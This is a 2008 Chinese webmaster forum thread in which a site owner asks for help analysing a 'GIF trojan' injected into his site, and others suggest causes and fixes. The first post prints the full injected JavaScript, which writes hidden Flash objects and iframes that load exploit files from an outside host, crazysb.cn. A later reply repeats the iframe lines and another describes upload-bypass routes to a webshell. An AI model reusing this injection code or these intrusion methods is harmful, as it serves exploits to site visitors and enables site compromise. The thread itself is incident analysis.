落伍者站长论坛 » 免费代码及编程交流 » 网站中了一个GIF木马，大家帮我分析一下漏洞

玫瑰灰 发表于 2008-5-30 19:31

网站中了一个GIF木马，大家帮我分析一下漏洞

一个JIF木马，新云的网站，开了用户上传功能，估计就是这个原因导致的！现在服务器还登陆不上去，郁闷的一比

<script src=http://crazysb.cn/count/js/gif.gif></script>

这个马的内容是这样的
window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
        var expires=new Date();
        expires.setTime(expires.getTime()+24*60*60*1000);
        document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
        if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
        {
                document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
                document.write('<param name="allowScriptAccess" value="sameDomain"/>');
                document.write('<param name="movie" value="http://crazysb.cn/count/1231.swf"/>');
                document.write('<param name="quality" value="high"/>');
                document.write('<param name="bgcolor" value="#ffffff"/>');
                document.write('<embed src="http://crazysb.cn/count/1231.swf"/>');
                document.write('</object>');
        }
        else
        {
                document.write("<EMBED src=http://crazysb.cn/count/1232.swf width=0 height=0>");
        }
}
document.writeln("<iframe style=display:none src=http:\/\/crazysb.cn\/count\/js\/news.htm><\/iframe>");
document.writeln("<iframe style=display:none src=http:\/\/crazysb.cn\/count\/js\/tj.htm><\/iframe>");


我用的是新云2.0，请问这个程序哪里有漏洞！

dachengzi 发表于 2008-5-30 19:59

恭喜恭喜，这是FLASH的ODAY，目前暂无补丁……

wo123456 发表于 2008-5-30 20:00

开了用户上传功能，估计就是这个原因导致的

dachengzi 发表于 2008-5-30 20:01

另说，我要落伍啊啊啊啊啊………………
----
建议LZ暂时不开放网站吧……
BUG可能是数据库默认，管理页面默认等。

玫瑰灰 发表于 2008-5-30 20:20

我查了一下，网站有两个站被挂马，一个是新云的程序，一个是爱聚合，如果说是开启了上传功能，即使他能传上去JIF文件也挂不上啊

玫瑰灰 发表于 2008-5-30 20:21

挂马的样式 <script src=http://crazysb.cn/count/js/gif.gif></script>

dachengzi 发表于 2008-5-30 20:27

不管什么扩展名都是能执行的
-----
肯定有BUG啦，可以查看查看IIS日志。

玫瑰灰 发表于 2008-5-30 20:35

[quote]原帖由 [i]dachengzi[/i] 于 2008-5-30 20:27 发表 [url=http://www.im286.com/redirect.php?goto=findpost&pid=26595445&ptid=2622817][img]http://www.im286.com/images/common/back.gif[/img][/url]
不管什么扩展名都是能执行的
-----
肯定有BUG啦，可以查看查看IIS日志。 [/quote]
登陆不了服务器，这是最重要的,NND

dachengzi 发表于 2008-5-30 20:39

3389？还是什么。

s1mp3.net 发表于 2008-5-30 21:36

可以肯定，楼主的服务器是2003，:)

lovour 发表于 2008-5-30 21:41

这个是放流量的页面.应该还有一个后门程序.找一下吧.

梁静茹 发表于 2008-5-30 21:42

[quote]原帖由 [i]dachengzi[/i] 于 2008-5-30 19:59 发表 [url=http://im286.com/redirect.php?goto=findpost&pid=26594896&ptid=2622817][img]http://im286.com/images/common/back.gif[/img][/url]
恭喜恭喜，这是FLASH的ODAY，目前暂无补丁…… [/quote]
看清楚吧
[quote]Adobe已确认不影响最新版本。

Potential Flash Player issue - update
Here's an update on our progress investigating the recent reports of a potential Flash Player exploit in the wild. The exploit appears to be taking advantage of a known vulnerability, reported by Mark Dowd of the ISS X-Force and wushi of team509, that was resolved in Flash Player 9.0.124.0 (CVE-2007-0071). This exploit does NOT appear to include a new, unpatched vulnerability as has been reported elsewhere - customers with Flash Player 9.0.124.0 should not be vulnerable to this exploit. We're still looking in to the exploit files, and will update everyone with further information as we get it, but for now, we strongly encourage everyone to download and install the latest Flash Player update, 9.0.124.0.

UPDATE: We've just gotten confirmation from Symantec that all versions of Flash Player 9.0.124.0 are not vulnerable to these exploits. Again, we strongly encourage everyone to download and install the latest Flash Player update, 9.0.124.0. To verify the Adobe Flash Player version number, access the About Flash Player page, or right-click on Flash content and select "About Adobe (or Macromedia) Flash Player" from the menu. Customers using multiple browsers are advised to perform the check for each browser installed on their system and update if necessary.

Thanks to Symantec for working very closely with us over the last 2 days to confirm that this is not a zero-day issue, and to Mark Dowd and wushi for originally reporting this issue.

This posting is provided "AS IS" with no warranties and confers no rights
[/quote]

装个主动防御就没事情了

梁静茹 发表于 2008-5-30 21:45

楼主这个挂马前提是要入侵者有你站点权限或是服务器权限
然后再对web程序中的页面挂马

最好方法查看IIS记录 找出webshell

事件查看器下的系统登陆事件

关键还是修补BUG

使用新云的程序不排除默认一些没修改或是有0day存在（你站流量大大的多）

yuewolf 发表于 2008-5-30 21:59

分析：
1.数据库或者其他程序上用的是默认的，包括管理登录路径 帐号密码等，可能性不是很大，毕竟你也不是新手了。
2.上传漏洞。对方通过一些伪造等，可以将ASP文件或者CER或其他文件伪造成图片格式上传，而你的上传目录又可以执行脚本。或者你的上传目录不可以执行脚本，但是对方上传时定义了其他路径，比如：本来你应该是/uploadfiles这个路径下的，他直接给定义了根目录或者其他可以执行ASP的目录，然后修改提交数据的相应长度，OK，获得你的一个WEBSHELL。
3.其他方式获得了WEBSHELL，然后通过第三方软件或者利用系统安全配置有问题，获得更高权限。
4.修改你某个文件，让你几乎所有的网页都嵌入这么一句代码。注意JAVASCRIPT里引用的文件，随便是什么都被正常解析的。
5.你的站没问题，和你一个服务器上的其他人的站有问题了，别人通过旁注得到了你的权限。

e54hacker 发表于 2008-5-31 07:27

:ohh: Flash 0day,升级到124版本就冒得事情了!

野汉子 发表于 2008-5-31 09:07

猪是的念来过倒

ljq 发表于 2008-5-31 15:34

恭喜恭喜，这是FLASH的ODAY，目前暂无补丁……

mlken 发表于 2008-5-31 19:24

技术，我是来学习的

jady 发表于 2008-6-2 06:37

document.writeln("<iframe style=display:none src=http:\/\/crazysb.cn\/count\/js\/news.htm><\/iframe>");
document.writeln("<iframe style=display:none src=http:\/\/crazysb.cn\/count\/js\/tj.htm><\/iframe>");

查看完整版本: 网站中了一个GIF木马，大家帮我分析一下漏洞